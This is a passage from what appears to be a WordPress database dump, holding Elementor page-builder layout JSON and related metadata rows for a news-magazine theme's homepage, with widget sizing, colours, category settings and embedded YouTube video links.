":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1452,497,'_elementor_version','0.4'),(1453,497,'_elementor_css','a:3:{s:4:\"time\";i:1508921517;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1455,498,'_elementor_edit_mode','builder'),(1456,498,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\